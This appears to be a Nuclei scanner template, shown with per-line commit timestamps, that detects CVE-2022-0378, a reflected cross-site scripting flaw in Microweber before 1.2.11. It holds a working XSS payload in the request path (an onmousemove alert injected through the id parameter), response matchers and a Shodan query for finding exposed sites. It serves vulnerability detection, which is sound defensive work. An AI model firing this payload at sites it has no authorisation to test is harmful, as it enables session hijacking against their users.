2022-02-06 05:41:20 +00:00
id : CVE-2022-0378
info :
2022-09-09 17:34:37 +00:00
name : Microweber Cross-Site Scripting
2022-02-06 05:41:20 +00:00
author : pikpikcu
severity : medium
2022-02-28 20:58:49 +00:00
description : Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 11:59:08 +00:00
remediation : |
Apply the latest security patch or upgrade to a version that has addressed the vulnerability.
2022-02-06 05:41:20 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2022-0378
2022-05-17 09:18:12 +00:00
- https://github.com/microweber/microweber/commit/fc7e1a026735b93f0e0047700d08c44954fce9ce
- https://huntr.dev/bounties/529b65c0-5be7-49d4-9419-f905b8153d31
2022-02-06 18:32:16 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.4
2022-02-06 18:32:16 +00:00
cve-id : CVE-2022-0378
cwe-id : CWE-79
2023-08-31 11:46:18 +00:00
epss-score : 0.001
2024-01-14 13:49:27 +00:00
epss-percentile : 0.40832
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
2022-04-22 10:38:41 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : microweber
product : microweber
2023-09-06 11:59:08 +00:00
shodan-query : http.favicon.hash:780351152
2024-01-14 09:21:50 +00:00
tags : cve2022,cve,microweber,xss,huntr
2022-02-06 05:41:20 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-06 05:41:20 +00:00
- method : GET
path :
2022-02-06 18:29:47 +00:00
- '{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x'
2022-02-06 05:41:20 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-02-06 18:29:47 +00:00
- 'mwui_init'
2022-02-06 05:41:20 +00:00
- 'onmousemove="alert(document.domain)'
condition : and
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2024-01-26 08:31:11 +00:00
# digest: 4a0a00473045022100fe49ea5424d89dfe689068589aa00c3dd37722dad370c9c901ccef33e2664172022079f1803ad17efa1f7351e64ecfcdd7ee530a39478b24f77b5c41d4d539026064:922c64590222798bb761d5b6d8e72950